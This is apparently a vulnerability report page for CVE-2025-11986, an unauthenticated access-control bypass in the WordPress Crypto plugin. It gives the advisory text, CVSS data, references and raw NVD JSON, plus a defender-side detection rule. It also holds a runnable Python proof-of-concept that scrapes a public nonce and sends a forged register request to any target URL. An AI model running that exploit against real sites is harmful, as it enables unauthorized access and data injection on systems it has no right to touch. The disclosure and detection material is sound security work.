Security Vulnerability Report
CVE-2025-11986 CVSS 5.3 MEDIUM

CVE-2025-11986

Published: 2025-11-11 04:15:45
Last Modified: 2026-04-15 00:35:42

Description

The Crypto plugin for WordPress is vulnerable to Information exposure in all versions up to, and including, 2.22. This is due to the plugin registering an unauthenticated AJAX action (wp_ajax_nopriv_crypto_connect_ajax_process) that allows calling the register and savenft methods with only a publicly-available nonce check and no wallet signature verification. This makes it possible for unauthenticated attackers to set a site-wide global authentication state via a single transient, bypassing all access controls for ALL visitors to the site. The impact is complete bypass of [crypto-block] shortcode restrictions and page-level access controls, affecting all site visitors for one hour, plus the ability to inject arbitrary data into the plugin's custom_users table.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Crypto plugin < 2.22

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2025-11986 PoC - WordPress Crypto Plugin Unauthorized Access Control Bypass
Note: This PoC is for educational and security testing purposes only.
"""
import requests
import re
import sys
from urllib.parse import urljoin


def get_nonce(target_url):
    """Extract nonce from the target WordPress site"""
    try:
        response = requests.get(target_url, timeout=10)
        # Look for wpCreateNonce or crypto-related nonces
        nonce_patterns = [
            r'nonce\s*[=:]\s*["\']([a-zA-Z0-9]+)["\']',
            r'cryptoConnectNonce\s*[=:]\s*["\']([a-zA-Z0-9]+)["\']',
            r'ajaxnonce\s*[=:]\s*["\']([a-zA-Z0-9]+)["\']'
        ]
        content = response.text
        for pattern in nonce_patterns:
            match = re.search(pattern, content)
            if match:
                return match.group(1)
        return None
    except Exception as e:
        print(f"[-] Error fetching nonce: {e}")
        return None


def exploit_crypto_plugin(target_url, nonce=None):
    """Send malicious request to bypass authentication"""
    endpoint = urljoin(target_url, '/wp-admin/admin-ajax.php')
    # Prepare the malicious payload
    data = {
        'action': 'crypto_connect_ajax_process',
        'sub_action': 'register',
        'nonce': nonce or 'dummy',
        'wallet_address': '0x' + 'A' * 40,
        'signature': 'malicious_signature',
        'email': '[email protected]',
        'username': 'attacker_injected'
    }
    try:
        print(f"[*] Sending exploit request to {endpoint}")
        response = requests.post(endpoint, data=data, timeout=10)
        if response.status_code == 200:
            print("[+] Request sent successfully")
            print(f"[*] Response: {response.text[:500]}")
            return True
        else:
            print(f"[-] Request failed with status {response.status_code}")
            return False
    except Exception as e:
        print(f"[-] Error during exploitation: {e}")
        return False


def main():
    if len(sys.argv) < 2:
        print(f"Usage: python3 {sys.argv[0]} <target_url>")
        print(f"Example: python3 {sys.argv[0]} http://example.com")
        sys.exit(1)
    target = sys.argv[1].rstrip('/')
    print(f"[*] Target: {target}")
    print("[*] Extracting nonce...")
    nonce = get_nonce(target)
    if nonce:
        print(f"[+] Found nonce: {nonce}")
    else:
        print("[*] Using default nonce or proceeding without it")
    print("[*] Launching exploit...")
    exploit_crypto_plugin(target, nonce)


if __name__ == '__main__':
    main()
```
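As an added defender-side example (not part of this report, the PoC, or the plugin's own code): a WAF-style check that flags calls to the unauthenticated action described above whose wallet fields a signature-verifying handler would have rejected. It assumes EVM-style wallets (0x-prefixed 20-byte address, 65-byte r,s,v signature); the sample request is constructed to mirror the PoC's parameters.

```python
import re
from urllib.parse import parse_qs

VULN_ACTION = "crypto_connect_ajax_process"
RISKY_SUB_ACTIONS = {"register", "savenft"}  # the two methods the advisory names
# Assumption: EVM wallets, i.e. a 20-byte 0x address and a 65-byte (r,s,v) signature.
ADDR_RE = re.compile(r"^0x[0-9a-fA-F]{40}$")
SIG_RE = re.compile(r"^0x[0-9a-fA-F]{130}$")


def parse_request(raw: str):
    """Minimal HTTP/1.1 request parser -> (method, path, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def flag_request(raw: str):
    """Reason string if the request looks like a CVE-2025-11986 attempt, else None.

    A valid nonce does not clear the request: any visitor can read it off a page.
    What separates abuse from a real wallet-connect flow is a wallet_address or
    signature that the handler would have rejected had it verified them at all.
    """
    method, path, headers, body = parse_request(raw)
    if method != "POST" or not path.endswith("/wp-admin/admin-ajax.php"):
        return None
    form = {k: v[0] for k, v in parse_qs(body).items()}
    if form.get("action") != VULN_ACTION or form.get("sub_action") not in RISKY_SUB_ACTIONS:
        return None
    if "wordpress_logged_in_" in headers.get("cookie", ""):
        return None  # logged-in callers hit wp_ajax_, not the nopriv hook
    problems = [name for name, rx in (("wallet_address", ADDR_RE), ("signature", SIG_RE))
                if not rx.match(form.get(name, ""))]
    if not problems:
        return None
    src = headers.get("x-forwarded-for") or headers.get("host", "?")
    return f"{VULN_ACTION}/{form['sub_action']} from {src}: malformed " + ", ".join(problems)


# Constructed sample shaped like the PoC above: public nonce, junk signature, no session.
SAMPLE_POST = (
    "POST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: example.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "action=crypto_connect_ajax_process&sub_action=register&nonce=abc123"
    "&wallet_address=0x" + "A" * 40 + "&signature=malicious_signature"
)
```

On a site still running an affected version this rule is a signal for blocking at the edge; on a patched site it remains a useful indicator that someone is probing for the bug.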

References

https://plugins.trac.wordpress.org/browser/crypto/tags/2.22/includes/class-crypto-user.php#L95
https://plugins.trac.wordpress.org/browser/crypto/tags/2.22/includes/class-crypto_connect_ajax_register.php#L65
https://plugins.trac.wordpress.org/browser/crypto/tags/2.22/includes/class-crypto_connect_ajax_register.php#L9
https://plugins.trac.wordpress.org/browser/crypto/tags/2.22/includes/class-crypto_connect_ajax_register.php#L95
https://www.wordfence.com/threat-intel/vulnerabilities/id/f062ef94-e558-478e-bbfd-06616aeb566b?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-11986",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-11T04:15:44.780",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Crypto plugin for WordPress is vulnerable to Information exposure in all versions up to, and including, 2.22. This is due to the plugin registering an unauthenticated AJAX action (wp_ajax_nopriv_crypto_connect_ajax_process) that allows calling the register and savenft methods with only a publicly-available nonce check and no wallet signature verification. This makes it possible for unauthenticated attackers to set a site-wide global authentication state via a single transient, bypassing all access controls for ALL visitors to the site. The impact is complete bypass of [crypto-block] shortcode restrictions and page-level access controls, affecting all site visitors for one hour, plus the ability to inject arbitrary data into the plugin's custom_users table."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-306"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/crypto/tags/2.22/includes/class-crypto-user.php#L95",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/crypto/tags/2.22/includes/class-crypto_connect_ajax_register.php#L65",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/crypto/tags/2.22/includes/class-crypto_connect_ajax_register.php#L9",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/crypto/tags/2.22/includes/class-crypto_connect_ajax_register.php#L95",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f062ef94-e558-478e-bbfd-06616aeb566b?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```